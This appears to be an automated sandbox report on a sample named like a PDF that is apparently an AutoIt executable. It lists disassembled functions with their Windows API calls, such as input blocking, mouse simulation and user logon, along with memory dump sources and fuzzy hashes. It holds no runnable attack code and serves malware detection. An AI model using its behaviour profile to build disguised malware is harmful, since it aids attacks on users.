                                                                          • Instruction ID: 9eff63d6d478d52f28e93c8a15e071c88beeaf440938693011bde94d4a9c7ffc
                                                                          • Opcode Fuzzy Hash: 89c3d7f2bd3044f5cfec347c6a89d6b3d8d198d2677e2ffaf614444ceb8da2de
                                                                          • Instruction Fuzzy Hash: C921E4726395108FC329CF25D841A56B3E1EBA5311F288E6CD0E5CB2D0CE75BD05DB94
                                                                          Function 00B541FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • BlockInput.USER32(00000001), ref: 00B54218
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BlockInput
                                                                          • String ID:
                                                                          • API String ID: 3456056419-0
                                                                          • Opcode ID: ca3c0315c1193d75d1defa856d380787b6af22151adc730a2b69e2baca439c55
                                                                          • Instruction ID: 86f91a206a18cbb4eea474ebef9659b9d9f323cd67e5aab83c84e877622a858b
                                                                          • Opcode Fuzzy Hash: ca3c0315c1193d75d1defa856d380787b6af22151adc730a2b69e2baca439c55
                                                                          • Instruction Fuzzy Hash: AEE04F712502149FC710EF5AE844A9BF7E8EF997A1F008066FC4AC7352DBB1E845CBA0
                                                                          Function 00B44EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B44F18
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: mouse_event
                                                                          • String ID:
                                                                          • API String ID: 2434400541-0
                                                                          • Opcode ID: 064934f8809e8c1b6ead3a3d328576a3ed43ee08a38bfe294dd865928d8559b1
                                                                          • Instruction ID: 7cc34056f94f41af46a5403f45a6b3ebe0afd09c5465b2b36d1da4b96a2f4938
                                                                          • Opcode Fuzzy Hash: 064934f8809e8c1b6ead3a3d328576a3ed43ee08a38bfe294dd865928d8559b1
                                                                          • Instruction Fuzzy Hash: A2D05EB016821538FC184B20AC0FF760188E341781F8449C9720A954C19AE56E38B035
                                                                          Function 00B38C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B388D1), ref: 00B38CB3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LogonUser
                                                                          • String ID:
                                                                          • API String ID: 1244722697-0
                                                                          • Opcode ID: 2aab1372eef548beba0fc4ac6e833a4e600d2a5da895062724fe81d1755c5620
                                                                          • Instruction ID: c4486dc37eeef0b98556857207be3b08b23a8d3d2f9ff09391516a597dcfea20
                                                                          • Opcode Fuzzy Hash: 2aab1372eef548beba0fc4ac6e833a4e600d2a5da895062724fe81d1755c5620
                                                                          • Instruction Fuzzy Hash: 31D09E3226450EBBEF019EA4ED05EBE3B69EB04B01F408511FE15D61A1C7B5D935AB60
                                                                          Function 00B22230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00B22242
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 6030af1aaa8d6e5718a79b01a8e0281d157f11b832da8737a2842541bd9ec0a7
                                                                          • Instruction ID: 4f2dea8ce8885ab2a2cef784252444038021a71ed3d40f34f9a5c9a8de939628
                                                                          • Opcode Fuzzy Hash: 6030af1aaa8d6e5718a79b01a8e0281d157f11b832da8737a2842541bd9ec0a7
                                                                          • Instruction Fuzzy Hash: 1CC04CF1801119DBDB05DF90E988DFE77BCAB04304F104495E105F2140D7749B448A71
                                                                          Function 00B0A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B0A36A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 15df079b6f35f27285f1cc98b342e909a30cc0b7cf61006fc5c45e0c2fa1f62f
                                                                          • Instruction ID: db4957c34b17d180044ab6f8217753857383ebd00bf7d36c99439382fa75fb31
                                                                          • Opcode Fuzzy Hash: 15df079b6f35f27285f1cc98b342e909a30cc0b7cf61006fc5c45e0c2fa1f62f
                                                                          • Instruction Fuzzy Hash: A5A0243000010DF7CF001F41FC044547F5CD7001D07004030F50C41131DF73541045C4
                                                                          Function 00AF8A0E Relevance: .6, Instructions: 608COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9d7862f35bb4bb48324af86fca8994ba362d06d6fe1d824c15fef974a4cde99c
                                                                          • Instruction ID: 6c4500da2d8a606f88230cc48886f8f62fe070ecc7455aa50396bb44ebf2dbb0
                                                                          • Opcode Fuzzy Hash: 9d7862f35bb4bb48324af86fca8994ba362d06d6fe1d824c15fef974a4cde99c
                                                                          • Instruction Fuzzy Hash: 81220770605659CBDF388BA4C4D467D77F1EB02344F7544AAFA928B291DB3C9D82CB60
                                                                          Function 00B02405 Relevance: .3, Instructions: 345COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction ID: b13b6e4d1fdc45eb3e9a78678d31cb983004fd93f8ad38425a07be535680a3fb
                                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction Fuzzy Hash: B4C1803220519309DB2D473D957813EBEE19AA27F171A0BDDE8B3CB5D5EF20D928D620
                                                                          Function 00B0283A Relevance: .3, Instructions: 341COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction ID: 09672fc9ef5b61cd007f765ab44240405ce867648844c30e289befda350f0d38
                                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction Fuzzy Hash: 82C1833220519309DF6D473D957813EBFE19AA27F131A0BEDE4B2DB5D4EF20D5289620
                                                                          Function 00B01BB8 Relevance: .3, Instructions: 323COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction ID: c8c8b1fea45cdae8b85ceaf68def85ffae7563d2fee4cb0536356e48f7c64b3d
                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction Fuzzy Hash: 3EC16F322091930ADB2D463ED57413EBEE1DAA27F131A0FEDE4B2CB5D4EF20D5649620
                                                                          Function 01C535D0 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                          • Instruction ID: 1f2ca719882e22a33ed771900708fc5012639451727dbb707be951c7d8a79bc0
                                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                          • Instruction Fuzzy Hash: E541C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB50
                                                                          Function 01C534C0 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                          • Instruction ID: 042ca32aed081e9388e35b16ee06221ba1f7fa8a07ccc3cfc6e3621ca048a440
                                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                          • Instruction Fuzzy Hash: FE01D278A00109EFCB84DF98C5909AEFBB5FB48310F208599DC09A7301D731EE81DB84
                                                                          Function 01C53460 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                          • Instruction ID: 2efc22b8757f9242d79f6b78977fe57a5cabb89621d51b1fde2fa7ec783dddf4
                                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                          • Instruction Fuzzy Hash: 27019278A00149EFCB85DF99C5909AEFBB5FB48350F208599EC09A7701D730EE81DB94
                                                                          Function 01C51E70 Relevance: .0, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                          Function 00B57B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 00B57B70
                                                                          • DeleteObject.GDI32(00000000), ref: 00B57B82
                                                                          • DestroyWindow.USER32 ref: 00B57B90
                                                                          • GetDesktopWindow.USER32 ref: 00B57BAA
                                                                          • GetWindowRect.USER32(00000000), ref: 00B57BB1
                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B57CF2
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B57D02
                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57D4A
                                                                          • GetClientRect.USER32(00000000,?), ref: 00B57D56
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B57D90
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DB2
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DC5
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DD0
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00B57DD9
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DE8
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00B57DF1
                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DF8
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00B57E03
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57E15
                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B72CAC,00000000), ref: 00B57E2B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00B57E3B
                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B57E61
                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B57E80
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57EA2
                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5808F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          • API String ID: 2211948467-2373415609
                                                                          • Opcode ID: 580945c40d9375ac14a92a4963c132523fd95420ce3667a6be43599803389d83
                                                                          • Instruction ID: 3a845b52e49828ea88ea53d8563354a2ad54f4c1720dbacfb3fbc9d33cee1c5e
                                                                          • Opcode Fuzzy Hash: 580945c40d9375ac14a92a4963c132523fd95420ce3667a6be43599803389d83
                                                                          • Instruction Fuzzy Hash: E9028D71A00215EFDB14DF64ED89EAE7BB9FF49311F148198F915AB2A1CB74AD00CB60
                                                                          Function 00B637F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,00B6F910), ref: 00B638AF
                                                                          • IsWindowVisible.USER32(?), ref: 00B638D3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                          • API String ID: 4105515805-45149045
                                                                          • Opcode ID: 616ddb4f29a1ee9dab28c3d638e08c1477f70d5a615b9d1e00e869a97e054468
                                                                          • Instruction ID: fbae088cdb64db627801e128f100d1c175fa603f89ab4b0dd5793329081e3930
                                                                          • Opcode Fuzzy Hash: 616ddb4f29a1ee9dab28c3d638e08c1477f70d5a615b9d1e00e869a97e054468
                                                                          • Instruction Fuzzy Hash: 8FD17F30218305ABCB14EF11C591A6EBBE1EF94B44F1445E8F8865B3E2CB75EE0ACB51
                                                                          Function 00B6A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00B6A89F
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00B6A8D0
                                                                          • GetSysColor.USER32(0000000F), ref: 00B6A8DC
                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00B6A8F6
                                                                          • SelectObject.GDI32(?,?), ref: 00B6A905
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B6A930
                                                                          • GetSysColor.USER32(00000010), ref: 00B6A938
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00B6A93F
                                                                          • FrameRect.USER32(?,?,00000000), ref: 00B6A94E
                                                                          • DeleteObject.GDI32(00000000), ref: 00B6A955
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00B6A9A0
                                                                          • FillRect.USER32(?,?,?), ref: 00B6A9D2
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6A9FD
                                                                            • Part of subcall function 00B6AB60: GetSysColor.USER32(00000012), ref: 00B6AB99
                                                                            • Part of subcall function 00B6AB60: SetTextColor.GDI32(?,?), ref: 00B6AB9D
                                                                            • Part of subcall function 00B6AB60: GetSysColorBrush.USER32(0000000F), ref: 00B6ABB3
                                                                            • Part of subcall function 00B6AB60: GetSysColor.USER32(0000000F), ref: 00B6ABBE
                                                                            • Part of subcall function 00B6AB60: GetSysColor.USER32(00000011), ref: 00B6ABDB
                                                                            • Part of subcall function 00B6AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B6ABE9
                                                                            • Part of subcall function 00B6AB60: SelectObject.GDI32(?,00000000), ref: 00B6ABFA
                                                                            • Part of subcall function 00B6AB60: SetBkColor.GDI32(?,00000000), ref: 00B6AC03
                                                                            • Part of subcall function 00B6AB60: SelectObject.GDI32(?,?), ref: 00B6AC10
                                                                            • Part of subcall function 00B6AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00B6AC2F
                                                                            • Part of subcall function 00B6AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B6AC46
                                                                            • Part of subcall function 00B6AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00B6AC5B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                          • String ID:
                                                                          • API String ID: 4124339563-0
                                                                          • Opcode ID: abcf856f08fc5823aa1a8ee09439771c81dfc0be59ad0e94b044f0654c39f395
                                                                          • Instruction ID: afc9759ebb9f094afb669849386e47453cf3ad8d41350a6d9723817335b064fa
                                                                          • Opcode Fuzzy Hash: abcf856f08fc5823aa1a8ee09439771c81dfc0be59ad0e94b044f0654c39f395
                                                                          • Instruction Fuzzy Hash: DEA17472408302AFDB109F64EC48A6B7BE9FF89321F104A29F552A71E1DB79D944CF52
                                                                          Function 00AE2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?), ref: 00AE2CA2
                                                                          • DeleteObject.GDI32(00000000), ref: 00AE2CE8
                                                                          • DeleteObject.GDI32(00000000), ref: 00AE2CF3
                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00AE2CFE
